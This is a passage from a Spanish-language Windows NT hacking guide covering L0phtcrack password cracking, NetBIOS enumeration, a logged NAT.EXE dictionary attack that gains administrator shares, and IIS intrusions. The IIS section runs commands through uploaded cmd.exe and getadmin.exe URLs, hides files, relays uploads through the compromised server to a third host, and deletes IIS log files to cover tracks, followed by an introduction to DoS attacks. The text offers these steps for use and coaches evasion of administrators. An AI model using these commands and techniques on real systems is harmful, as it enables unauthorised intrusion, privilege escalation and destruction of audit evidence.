implican que un servidor puede ser capaz de forzar a un cliente a usar el dialecto MD4 de NT en la conexion, sin dar la posibilidad de usar LANMAN. Por eso, se debe ser capaz de poder crackear este tipo de passwords directamente, dado que, a menudo, en una sesion de hacking, se usaran sniffers que pondran a la tarjeta de red en modo promiscuo, pudiendo monitorizar todo el trafico de la red. 3.5.3. Rendimiento de L0phtcrack. La revision 1 de la herramienta, era capaz de probar un diccionario de 8 megas contra un listado de 100 usuarios en menos de 1 minuto en un Pentium Pro 200 con la version de interface grafico. La version de linea de comandos (ventana MSDOS) es algo mas rapida incluso, pudiendo sondear por fuerza bruta la cadena "ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_" en un poco mas de 3 dias en un P133. La version 2.0 es capaz de chequear cientos de usuarios con un diccionario de 100.000 palabras en unos pocos minutos usando un Pentium Pro 200. La unica pega de usar el metodo de fuerza bruta es que solo encuentra passwords muy simples (mal elegidos por su due€o debido a su simplicidad). En la version 2.0, usando la cadena de caracteres A-Z, nos lleva 24 horas generar todas las posibles combinaciones y encriptarlar en un Ppro 200. Si se usa la cadena A-Z, 0-9, lleva alrededor de 10 dias. Ademas, hay que tener en cuenta que existe una prueba para determinar de forma rapida cuando un usuario ha elegido un password de 7 caracteres o menos ] y empezar a crackear solo este tipo de passwords, con el consiguiente ahorro de tiempo. 3.5.4. Donde conseguir la herramienta L0phtcrack. L0phtcrack se distribuia libremente en http://www.l0pht.com/advisories.html, donde ademas se notificaban los nuevos ataques y vulnerabilidades encontrados contra sistemas operativos y programas/utilidades/servicios conocidos. Sin embargo la ultima version, la 2.0, ya no trae el codigo fuente. Ademas, deja de ser gratuita para pasar a ser shareware. A cambio, introduce las siguientes mejoras: $ Un sniffer de red para capturar sesiones SMB, lo que permite recolectar passwords LANMAN encriptados sin tener permisos de administrador. $ Usar la funcion SAMDUMP para extraer los passwords encriptados (los hashes) de la rama SAM del registro, del disco de reparacion de emergencia o de una cinta de backup. $ La capacidad de salvar y restaurar un ataque de fuerza bruta empezado y no terminado.. Se guardan tanto la iteracion actual como el conjunto de caracteres usado junto con los resultados parciales. Este fichero es salvado automaticamente cada 5 minutos, para no perder por un descuido (corte de luz, aparicion repentina del administrador...) cualquier resultado de un ataque por fuerza bruta. $ Cuando una de las mitades de un password LANMAN es encontrada, se muestra por pantalla. Esto nos puede ayudar a descifrar el resto por sentido comun. $ Se ofrecen cadenas de caracteres para el ataque de fuerza bruta. $ Algoritmo de multiproceso para ataques de fuerza bruta. Rendimiento de un ataque por fuerza bruta: 6 horas en un ataque usando la cadena de caracteres de la A -Z y 62 horas usando la cadena de la A-Z,0-9 en un ordenador equipado con cuatro procesadores Pentium Pro 200. $ Mayor velocidad de sondeo de passwords ante una gran entrada de usuarios gracias a un algoritmo de busqueda mejorado. Ahora es posible usar fuerza bruta contra 10.000 entradas de usuario a la vez. $ L0phtCrack es ahora un proceso en background que se ejecuta con proridad inferior a la normal y puede ser ocultado inmediatamente (para ser posteriormente restaurado) mediante la pulsacion de una combinacion especial de teclas: Ctrl-Alt-L (otra vez util ante posibles entradas de personas non-gratas en mitad de un proceso de escaneo de passwords). La version de evaluacion, salio 6 meses despues de la version 1.5 y esta limitada a 15 dias de prueba, tras lo cual el producto deberia ser registrado, pagando $50. La version con interfaz de linea de comandos, recortada aunque con codigo fuente, tambien esta disponible de forma gratuita. 4. Introduccion a NetBIOS. 4.1. šQue es NetBIOS? NetBIOS (Network Basic Input Output System) fue originalmente desarrollado por IBM y Sytek como un API para el software cliente de recursos de una red local (LAN). Desde su creacion, NetBIOS se ha convertido en el fundamento de muchas otras aplicaciones de red. En sentido estricto, NetBIOS es una especificacion de interface para el acceso a servicios de red. NetBIOS, una capa de software desarrollado para enlazar un sistema operativo de red con hardware especifico, fue originalmente dise€ado como EL controlador de red para las redes LAN de IBM. Hoy en dia, NetBIOS ha sido extendido para permitir a los programas que han sido escritos usando dicho interface poder trabajar con la arquitectura Token Ring de IBM. NetBIOS ha sido adoptado como un estandar mundial y hoy en dia es comun escuchar que una red local es compatible NetBIOS. Resumiendo, y de forma sencilla, NetBIOS permite a las aplicaciones 'hablar' con la red. Su intencion es conseguir aislar los programas de aplicacion de cualquier tipo de deopendencia del hardware. Tambien evita que los desarrolladores de software tengan que desarrollar rutinas de recuperacion ante errores o de enrutamiento o direccionamiento de mensajes a bajo nivel. NetBIOS hace el 'trabajo sucio'. En una red local con soporte NetBIOS, los ordenadores son conocidos e identificados con un nombre. Cada computador de la red tiene un unico nombre. Cada PC de una red local NetBIOS se comunica con los otros bien sea estableciendo una conexion (session), usando datagramas NetBIOS o mediante broadcast. Las sesiones (establecimiento de una conexion) permiten, como en el protocolo TCP, mandar mensajes mas largos y gestionar el control y recuperacion de errores. La comunicacion sera punto a punto. Por otro lado, los metodos de datagramas y broadcast permiten a un ordenador comunicarse con otros cuantos al mismo tiempo, pero estando limitados en el tama€o del mensaje. Ademas, no hay control ni recuperacion de errores (al igual que ocurre en UDP). A cambio, se consigue una mayor eficiencia con mensajes cortos, al no tener que establecer una conexion. Asi pues, NetBIOS permite comunicacion orientada a conexion (TCP) o no orientada a conexion (UDP). Soporta tanto broadcast como multicast, ademas de 3 tipos de servicio diferentes: Servicio de Nombres, Servicio de Sesion y Servicio de Datagramas. 4.2. Servicio de Nombres en NetBIOS Los nombres en NetBIOS son usados para identificar recursos en la red. Las aplicaciones usan estos nombres para empezar y terminar conexiones. Puedes configurar una unica maquina para multiples aplicaciones y asignar un nombre distinto a cada una de ellas. Ademas en NetBIOS se identifica tambien a cada ordenador de la red de forma univoca, por un unico nombre. Cada uno de estos nombres puede estar formado por 16 caracteres alfanumericos. La combinacion de caracteres debe ser unica dentro de cada red. Para ello, antes de que un PC pueda usar un nombre NetBIOS, debe resgistrarlo. Cuando un cliente quiere registrar un nombre, debe advertirlo a toda la red mediante broadcast y esperar las respuestas de los otros nodos para confirmar que el nombre no esta en uso. Si ningun cliente reclama el nombre, el proceso de registro termina y el nombre de servicio ha quedado registrado. Existen 2 tipo de nombres en un entorno NetBIOS: 'Unique' y 'Group'. Un nombre 'Unique', como su propio nombre indica, debe ser unico en toda la red. Un nombre de grupo no tiene por que ser unico y asi, todos los procesos con un determinado nombre de grupo pertenecen a dicho grupo. Cada nodo NetBIOS mantiene una tabla con todos los nombres de los que es propietario. Aunque en principio las especificaciones NetBIOS permiten nombres de 16 caracteres, Microsoft los limita a 15 y usa el 16§ como un sufijo NetBIOS. Este sufijo es usado por el software de rted de Microsoft para identificar el servicio o dispositivo registrado. Los puertos en los que 'trabaja' NetBIOS sobre TCP/IP (NBT) son el 137 Servicio de Nombres NetBIOS (UDP), 138 Servicio de datagramas NetBIOS (UDP) y el 139, Servicio de Conexion NetBIOS (TCP). A continuacion se lista una tabla de los sufijos NetBIOS usados actualmente por Microsoft Windows NT. Los sufijos se muestran en formato hexadecimal. 'Unique' (U): el nombnre deberia tener solo una direccion IP asignada. En un dispositivo de red, podria parecer que aparecieran registradas multiples ocurrencias de un mismo nombre, pero el sufijo sera unico, por lo que el nombre completo (con sufijo) sera unico ('Unique'). 'Group' (G): un grupo normal; un unico nombre podria tener asignadas varias direcciones IP. 'Multihomed' (M): el nombre es unico, pero debido a que en un mismo ordenador puede haber mas de un interface de red, esta configuracion es necesaria para permitir su registro. El numero maximo de direcciones IP que puede tener asignado es de 25. 'Internet Group' (I): esta es una configuracion especial de un nombre de grupo para poder gestionar los nombres de dominio de Windows NT. 'Domain Name' (D): nuevo en NT 4.0 (Nombre de Dominio) Para echarle un vistazo a los nombres y servicios NetBIOS registrados en los servidores de la red, puedes ejecutar el siguiente comando: 'nbtstat -A [direccion_IP]' o 'nbtstat -a [nombre_host] 4.3. El servicio de 'Session' NetBIOS El servicio de Session (Conexion) NetBIOS nos ofrece un servicio orientado a conexion, seguro (se asegura que los datos llegan a su destino) y full-duplex. El establecimiento de una conexion NetBIOS requiere que una estacion cliente y otra estacion servidor esten sincronizados. Asi, una estacion debe estar en modo listen cuando la otra le mande un comando call. Cuando se establece una llamada cada aplicacion recibe una notificacion de que efectivamente, se ha establecido la conexion y un identificador de la misma. Los comandos send y receive transfieren los datos. Al final de una sesion, cualquiera de las dos aplicaciones puede lanzar un comando de fin Hang-Up (colgar). No hay un control de flujo real para el servicio de conexion debido a que se asume que la red local (LAN) es lo suficientemente rapida como para soportar todo el trafico generado. 4.4. Datagramas NetBIOS Los datagramas pueden ser enviados a un nombre especifico, a todos los miembros de un grupo o en modo broadcast a toda la red. Como en otros servicios de datagrama (UDP), los datagramas NetBIOS son no orientados a conexion y no aseguran que los datos lleguen a su destino. El comando Send_Datagram requiere que el emisor especifique el nombre del destino. Si el destino es un nombre de grupo, todos los miembros del mismo recibiran el datagrama. La aplicacion que lance un comando "Receive_Datagram" debe especificar el nombre local para el que quiere recibir servicio de datagramas. Este comando devuelve, ademas de los datos propiamente dichos que lleve el datagrama, el nombre del emisor. Si NetBIOS recibe un datagrama, pero no se ha lanzado un comando "Receive_Datagram", el datagrama sera descartado. El comando Send_Broadcast_Datagram manda el mensaje a todos los sistemas NetBIOS de la red local. Cuando un datagrama de este estilo es recibido por un nodo NetBIOS, cada proceso que haya lanzado un comando "Receive_Broadcast_Datagram" recibira dicho datagrama. Si no existe ninguna peticion de recepcion de datagramas, este sera descartado. NetBIOS permite a una aplicacion establecer una conexion con cualquier otro dispositivo y deja que el redirector y los protocolos de transacciones pasen los mensajes entre maquinas. NetBIOS no manipula de ninguna manera los mensajes. Las especificaciones NetBIOS define un interface para el protocolo de red usado para obtener ciertos servicios, pero no define el protocolo como tal. Historicamente se ha emparejado con un protocolo de red llamado NetBEUI (Network Extended User interface). La asociacion del interface y del protocolo a menudo puede llevar a confusion, pero son dos cosas diferentes. Los protocolos de red siempre ofrecen al menos un metodo de localizar y conectarse a un servicio concreto de una red. Esto se consigue normalmente convirtiendo el nombre de un nodo o de un servicio a una direccion de red (lo que se ha dado en llamar resolucion de nombres). Los nombres NetBIOS deben ser resueltos a una direccion IP antes de establecer una conexion TCP/IP. Muchas implementaciones NetBIOS para TCP/IP consiguen la resolucion de nombres bien sea usando broadcast o ficheros LMHOSTS. En un entorno Microsoft Windows, seguramente usaras un Servidor de Nombres NetBIOS conocido como WINS. 5. Vulnerabilidades NetBios. NAT. Esta tecnica de ataque NetBIOS ha sido verificada en Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server y Windows 98 beta 2.1. Uno de los componentes que se suelen usar en este tipo de ataques es NAT.EXE, una utilidad de Andrew Tridgell. A continuacion, discutiremos los usos de esta herramienta, sus parametros y las tecnicas mas usadas: NAT.EXE [-o nombre_fichero] [-u lista_usuarios] [-p lista_passwords] <direccion_IP> Parametros: -o Especifica el fichero de salida. Todos los resultados del escaneo seran escritos en este fichero, ademas de en pantalla. -u Especifica el fichero fuente del que se leeran los nombres de usuario. Se usaran estos nombres en un ataque de diccionario al servidor remoto. Los nombres deben aparecer uno por linea. -p Especifica el fichero donde se encuentran los passwords a probar. Deben ir tambien uno por linea. <direccion_IP> Las direcciones deben ir delimitadas por comas, sin espacios. Ejemplos de rangos de direcciones validas son: nombre_host : se escaneara este host 127.0.0.1-127.0.0.3 : escaneara el rango de direcciones comprendido entre 127.0.0.1 y 127.0.0.3 127.0.0.1-3 : equivalente al anterior. 127.0.0.1-2,7,10-20: escaneara el rango de direcciones comprendido entre 127.0.0.1 y 127.0.0.3 luego el host 127.0.0.7 y finalmente los comprendidos entre 127.0.0.10 y 127.0.0.20 nombre_host, 127.0.0.1-3 : escanea el nombre_host y luego las maquinas con @IP entre 127.0.0.1 y 127.0.0.3 Todas las combinaciones de nombres_host y rangos de direcciones especificadas como las del los ejemplos anteriores son validas. 5.1. El comando NBTSTAT El ataque realizado con NAT es equivalente a una combinacion de NBTSTAT y comandos NET. Por lo tanto, veamos con un poco mas de detalle los resultados de realizar un nbstat a la direccion XXX.XX.XXX.XX. C:\nbtstat -A XXX.XX.XXX.XX NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Recordemos un poco cual es el significado del 16§ bit en los codigos NetBIOS: Nombre_host <00> UNIQUE Nombre de servicio de la estacion de trabajo <00> GROUP nombre de dominio Servidor <20> UNIQUE Nombre de Servicio del Servidor Nombre_host <03> UNIQUE Registrado por el servicio de mensajeria. Este es nombre de host que debera a€adirse al fichero LMHOSTS, que, aunque no es necesario para el uso de NAT.EXE sera necesario si quieres ver el ordenador remoto en la lista de 'Network Neighborhood' (Otros ordenadores conectados) Nombre_Usuario <03> Registrado por el servicio de mensajeria. Nombre_Dominio <1B> Registra el ordenador local como el "master browser" para el dominio. Nombre_Dominio <1C> Registra el ordenador como un controlador de dominio para el dominio (PDC o BDC) Nombre_Dominio <1E> Se registra como un nombre de grupo NetBIOS <BF> Nombre del Monitor de Red <BE> Agente Monitor de Red <06> Servidor RAS <1F> Red DDE <21> Cliente RAS 5.2. Introduccion a los comandos NET El comando NET puede ser introducido por los administradores a traves de una ventana DOS para mostrar informacion sobre servidores, redes, recursos compartidos y conexiones. Tambien tiene un numero de opciones que puedes usar para a€adir cuentas de usuario, cambiar la configuracion del dominio y configurar recursos compartidos.. En esta seccion se mostraran estos comandos NET y se dara un peque€o script que se puede usar como una herramienta basica de analisis de seguridad. Antes de continuar con estas tecnicas, se discutiran las opciones disponibles para el comando NET. Net Accounts: este comando muestra la configuracion actual y las restricciones que se aplican en la politica de passwords, limitaciones de conexion e informacion de dominio. Tambien contiene opciones para actualizar la base de datos con las cuentas de los usuarios y modificar los requerimientos de conexion y password. Net Computer: a€ade o borra hosts de la base de datos de un dominio. Net Config Server o Net Config Workstation: muestra info. sobre la configuracion del servicio de servidor. Cuando se usa sin especificar Server o Workstation, el comando muestra una lista de los servicios configurables. Net Continue: reactiva un servicio NT que fue suspendido por un comando NET PAUSE. Net File: este comando muestra los ficheros abiertos en un servidor y tiene opciones para cerrar los ficheros compartidos y desbloquear ficheros. Net Group: muestra informacion sobre nombres de grupo y tiene opciones que se pueden usar para a€adir o modificar grupos globales en servidores. Net Help: ofrece ayuda para el comando Net. Net Helpmsg message#: ofrece ayuda para un error de red en particular o para un mensaje de alguna funcion. Net Localgroup: usado para listar grupos locales en servidores. Tambien es posible modificar estos grupos. Net Name: muestra los nombres de los ordenadores y de los usuarios a los que se les puede mandar mensajes. Net Pause: usa este comando para suspender un determinador servicio NT. Net Print: muestra los trabajos mandados a la impresora y las colas compartidas. Net Send: usado para mandar mensajes a otros usuarios u ordenadores de la red. Net Session: muestra informacion sobre las conexiones actuales. Ofrece comandos para desconectar ciertas sesiones. Net Share: muestra informacion sobre todos los recursos compartidos. Este comando es usado para crear recursos compartidos a traves de red. Net Statistics Server o Net Statistics Workstation: muestra el registro de estadisticas. Net Stop: para servicios NT, cancelando cualquier conexion que este usando el servicio. Hay que citar que parar un servicio puede traer como efecto lateral el detener otros. Net Time: comando usado para mostrar o inicializar la hora de un ordenador o dominio. Net Use: muestra una lista de ordenadores conectados y tiene opciones de conexion y desconexion de recursos compartidos. Net User: este comando mostrara una lista de cuentas de usuario para el ordenador y tiene opciones de manipulacion/creacion de estas cuentas. Net View: muestra una lista de recursos compartidos en un ordenador, incluyendo servidores Netware. 5.3. Una sesion de ataque NetBIOS mediante el uso de NET VIEW y NET USE C:\net view XXX.XX.XXX.XX Shared resources at XXX.XX.XXX.XX Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown. C:\net use /? The syntax of this command is: NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]] NET USE [devicename | *] [password | *]] [/HOME] NET USE [/PERSISTENT:{YES | NO}] C:\net use x: \\XXX.XX.XXX.XX\test The command completed successfully. C:\net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network OK \\XXX.XX.XXX.XX\test Microsoft Windows Network The command completed successfully. 5.4. Una sesion de ataque NetBIOS mediante el uso de NAT.EXE Ahora viene el esperado ejemplo de ataque NetBIOS mediante la utilidad NAT.EXE. La informacion listada a continuacion es una captura de una sesion de ataque real. La direccion IP ha sido modificada para prevenir represalias: C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YY.YY.YY.YY [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: XXX.XX.XXX.XX [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access Asi pues, si el recurso compartido tiene puestos los permisos por defecto: Control Total / Todos , el servidor esta a tu disposicion. Si no, sigue intentandolo. Te sorprenderia saber todo lo que se dejan los administradores por ahi ;-) 6. Vulnerabilidades en Internet Information Server (IIS) (Basado en el trabajo original en ingles de David Litchfield: "A discussion of a variety of potential "Hacks" on MS Internet Information Server) 6.1. Entrando por la puerta trasera. Recientemente realice una busqueda en Excite usando el siguiente criterio de busqueda: "batch files as CGI Scripts". Esta frase aparece en el capitulo 8 de la ayuda en linea de MS IIS. El resultado de la busqueda produjo una lista masiva de maquinas NT con IIS en Internet. Con gran curiosidad decidi sondear la fortaleza de estos sistemas desde el punto de vista de la seguridad (o la falta de ella). He testeado unas 50 maquinas y los resultados han sido sorprendentes. He encontrado 7 maquinas en las que se podria poner ficheros en el sistema via ftp; no solo eso: en 2 de esas maquinas podria copiar ficheros a un directorio www-virtual con permisos de lectura y ejecucion... Oooops!! Podria copiar cmd.exe (ahora veremos por que) y getadmin.exe (mas gasys.dll por supuesto) a ese directorio. Despues, usando mi navegador podria seguir la siguiente direccion URL: http://www.target.com/cgi-bin/getadmin.exe?iusr_hostname (es bastante comun que el servicio FTP en IIS muestre el nombre del servidor.. y si la cuenta anonima por defecto no ha sido deshabilitada tras realizar estos sencillos pasos...ya disponemos de una cuenta "propia"!). Ejecutando getadmin.exe de forma remota como se ha mostrado, realiza correctamente su trabajo ;-) ... pruebalo. Asi que ya disponemos de derechos de administrador ... pronto veremos que hacer con ellos. šQue podemos decir sobre cmd.exe? Apunta a una direccion de este estilo con el navegador: http://www.host.com/cgi-bin/cmd.exe?/c%20dir%20c:\winnt o la siguiente: http://somehost/cgibin/cmd.exe?/c%20copy%20c:\winnt\*.*%20c:\inetpub\ftproot si copiamos como hemos dicho el programa cmd.exe al directorio cgi-bin (por ejemplo) y el administrador abre el explorador de NT en ese directorio, el programa cmd.exe saltara a la vista inmediatamente... asi que es necesario esconderlo: http://somehost/cgibin/cmd.exe?/c%20c:\winnt\system32\attrib.exe%20%2BH%cmd.exe Esto hace que el fichero pase a estar oculto (esperemos que el administrador tenga puesto el filtro que viene por defecto en NT para no ver en el Explorador los archivos ocultos). Si te preocupa el significado de los signos de porcentaje, ahora pasamos a explicarlos: % este signo avisa de los dos numeros siguientes codifican en hexadecimal un caracter ASCII. %20 implica el signo ASCII de espacio en blanco %2B codifica el caracter ASCII '+', asi pues, el trozo de URL anterior: attrib.exe%20%2BH%20cmd.exe se puede "traducir" por attrib.exe +H cmd.exe Nota: si no usas el codigo ASCII en hexadecimal para el caracter '+' y en su lugar usas el signo '+' sin codificar, no se ejecutara el comando attrib correctamente dado que en CGI, el caracter '+' se usa para separar parametros. Nota para los administradores: configurar el Explorer de NT para que muestre todos los ficheros y el intruso no pueda esconder sus acciones tan facilmente. Una vez que tengas el fichero "cmd.exe" puedes ejecutar cualquier linea de comandos que quieras, lo que nos lleva a comentar el siguiente ataque. 6.2. El ataque Pipe HTTP/FTP La idea general es conectarse a una maquina, ejecutar un comando en esa maquina para que se conecte a una tercera, haciendo que la 2Š maquina sea una especie de proxy. He aqui los pasos a seguir: desde mi maquina, usando HTTP, conecto con el primer servidor, usando la siguiente URL: http://www.host.com/cgi-bin/cmd.exe?/c:%20c:\winnt\system32\ftp.exe%20- s:commands.txt%20dir_IP Expliquemos el significado de esta URL. Cuando ejecutamos ftp.exe podemos especificar el nombre de un fichero de texto que lista los comando que queramos ejecutar, p.ejm.: Anonymous Fakename@host.com Put file.txt Put program.exe Bye Obviamente, deberas manipular los comandos convenientemente para que se adecuen a tus necesidades... y lo que necesitamos ahora es subir este fichero a la segunda maquina. Al final de la URL tienes dir_IP. Esta es la direccion IP de la tercera maquina. Lo que hacemos es cargar el proceso ftp en memoria.. es importante mencionar que que la ventana de comandos no se abre en mitad del escritorio al hacer esto... la unica forma de darse cuenta de que el proceso ftp se esta ejecutando es usando el Task Manager (Adminitrador de Tareas) y buscar a traves de los procesos en ejecucion. Si todo va bien, supongase que la segunda maquina contacta con la tercera(el servidor a atacar) y ejecuta los comandos del fichero que acabamos de subir: "command,txt". Asi que... ya lo hemos conseguido... hemos dejado (o borrado si quisieramos) ficheros en la tercera maquina sin tener una conexion directa. La direccion IP que apareca en el fichero de logs (registro de actividad) de la tercera maquina sera la de la segunda y no la nuestra. Ahora, deberemos ocultar las trazas que hemos ido dejando en el ataque (deberiamos dejar el terreno tan limpio como cuando entramos) de la 2Š maquina. Recuerda que habiamos ejecutado getadmin.exe. El usuario IUSR:hostname tiene derechos de administrador... lo que es una suerte porque para ocultar tus "actividades" de la mejor manera que puedas necesitaras cambiar la fecha del sistema: http://www.hostname.com/cgi-bin/cmd.exe?/c%20date%2011/11/97 inicializa la fecha a un tiempo ya pasado... špor que? a) el administrador tendra que buscar en ficheros log antiguos (eso si se da cuenta de que ha pasado algo raro) y si los logs antiguos son borrados con cierta regularidad, tendra un peque€o problema... b) necesitaras borrar tambien otro log (para esconder tus trazas, la fecha en la que entraste y en la que te encuentras tras haberla cambiado). Concretamente el log que guarda las actividades del dia del ataque (sea 13-IV-98). Para ello espera 5 minutos (para que el log se escriba a disco) y sigue la siguiente direccion URL: http://www.host.com/cgi- bin/cmd.exe?/c%20del%20c:\winnt\system32\logfiles\in980413.log Despues, es necesario inicializar la fecha al dia de hoy... a la fecha en la que deberia estar... Hay otras cosas que se pueden hacer pero no entrare en mas detalles. El trabajo de limpieza que hemos realizado no soportara un intenso escrutinio pero pasara una inspeccion normal. Usando el ataque HTTP/FTP Pipe Attack podrias atravesar un firewall... si el firewall tiene una relacion de confianza con la @IP de la maquina IIS hackeada es posible pasar ficheros y otro tipo de trafico (ICMP) a traves del firewall... sientate y piensa que otras cosas se pueden "hacer" con la combinacion cmd.exe/getadmin.exe. Piensa tambien en usar net.exe [seccion-5.2] junto con estas dos aplicaciones para crear cuentas, cambiar passwords... lo que quieras... incluso acceso a la rama SAM del Registro de Windows NT si el administrador tiene permisos de lectura. Cuidado, si en el servidor se esta ejecutando Internet Service Manager (ISM) en su version HTML, es posible crear una cuenta, ejecutar getadmin.exe en dicha cuenta y saltarse la seguridad de ISM (ism.dll) con un identificador y/o un password correcto. 6.3. Otros ataques al IIS Agotar el recurso HD con ficheros .mdb Este tipo de ataque deberia ser clasificado como un ataque D.O.S. Es posible rellenar el disco duro del objetivo con ficheros .mdb de 40k cada uno. Lo que es preocupante es el hecho de que cerca de la mitad de las maquinas que he observado son susceptibles a este tipo de ataque. Si seguimos la siguiente direccion URL: http://www.host.com/scripts/tools/getdrvrs.exe nos llevara a una pagina Web donde podremos seleccionar un driver para crear una fuente de datos para un controlador ODBC. Siguiendo las instrucciones en pantalla podras crear un ficheros "loquequieras.mdb" de unos 40kb de longitud. Si ejecutamos lo mismo unas 1000 veces habremos ocupadoo 40MB de disco duro. No es dificil realizar un programa para automatizar la tarea (que incluso disponga de opciones para especificar nombres, tama€o a ocupar, etc...). Asi pues, es necesario proteger estas paginas con password. El Internet Service Manager (HTML) Si no modificamos los directorios de la instalacion por defecto, el ISM se encuentra en la siguiente direccion URL: http://www.host.com/iisadmin/default.htm Al intentar administrar cualquier servicio del ISM, se ejecuta la siguiente URL: http://www.host.com/scripts/iisadmin/ism.dll?http/serv Invariablemente, ism.dll lanza una peticion de password... es posible a su vez, lanzar contra esta peticion un ataque de fuerza bruta (si no es posible crear una cuenta como se describio antes). Otras paginas a tener en cuenta. Existe un ejemplo de Active Server Pages que viene con el IIS. Se encuentra en http://www.host.com/adworks/default.htm. Se cauto.. el directorio www tiene permisos de lectura y ejecucion, por lo que es conveniente eliminarlo del servidor. La pagina de administracion para el Index Server situada en : http://www.host.com/srchadm/admin.htm permite forzar escaneos, mezclas... cualquier cosa; es mas, nos da una vista total de todos los directorios virtuyales, pudiendo buscar ficheros con extension .pwd (es decir, los passwords encriptados de los controladores de Front Page (como hace Ogre [15]), que aunque parezca mentira, son los mismos que usan muchas personas como passwords para sus cuentas personales, de correo, de acceso a Internet... Por lo tanto, ADMINISTRADORES, proteged con passwords estas paginas. 6.4. Conclusion a los ataques IIS Para mantener a salvo un sitio Web, se debe cambiar la configuracion por defecto de la instalacion... y pasar una checklist para asegurarse al menos de que no se ha dejado ningun agujero conocido sin tapar. 7. Ataques tipo D.o.S. (Denial of Service, Denegacion de Servicio) Los ataques tipo D.o.S. consisten simplemente en dejar fuera de servicio cualquier servicio ofrecido por un servidor o estacion de trabajo, ocasionando a veces como efecto lateral, el cuelgue de la maquina, normalmente con un volcado de memoria (donde entra en juego la aplicacion Dr. Watson del sistema) y/o una pantalla azul (BSOD Blue Screen of Death) comunmente conocida como 'la pantalla de los pitufos'. Este es un tema controvertido, dado que algunas personas piensan que un ataque D.o.S. no es una tecnica de hacking, o lo tratan como algo sin importancia. Sin embargo, es un tema a tener muy en cuenta en Windows NT pues, la gran mayoria de los ataques son de tipo D.o.S. Existen algunas razones por las cuales, este tipo de ataques pueden ser utiles a un hacker: @ El hacker ha instalado un troyano, pero necesita que la victima reinicie la maquina para que surta efecto. @ El hacker necesita cubrir inmediatamente sus acciones o un uso abusivo de CPU. Para ello provoca un 'crash' del sistema, generando asi la sensacion de que ha sido algo pasajero y raro. Desgraciadamente, aun no sorprende en la familia Windows un cuelgue del sistema. @ El hacker no es tal, sino un personaje sin experiencia que apenas sabe lo que hace. @ El hacker cree que actua bien al dejar fuera de servicio algun sitio Web que le disgusta. @ El administrador del sistema quiere comprobar que sus instalaciones no son vulnerables a este tipo de ataques. @ El administrador del sistema tiene un proceso que no puede matar en su servidor y, debido a este, no puede acceder al sistema. Para ello, lanza contra si mismo un ataque D.o.S. parando asi el servicio y pudiendo entrar a reconfigurar. 7.1. Ataque OOB Este tipo de ataque es bastante simple, a la vez que accesible, dado el gran numero de programas que explotan esta debilidad en la implementacion TCP/IP de Microsoft. Basicamente, consiste en enviar un mensaje out-of-band a ciertos puertos de un sistema NT y este se colgara. Tipicamente se usa el puerto 139. Este tipo de ataque, tambien conocido como WinNuke se evita instalando el Service Pack 3 y el Hot Fix adecuado, pero han surgido varias variantes que aun son capaces de colgar un sistema NT. El codigo fuente de esta aplicacion esta muy difundido y cualquier busqueda en la Red con la palabra "winnuke" dara la direccion de muchas paginas que lo contienen. 7.2. Ataques Teardrop I, II, Newtear, Bonk, Boink. Este tipo de ataques consisten en mandar un par de 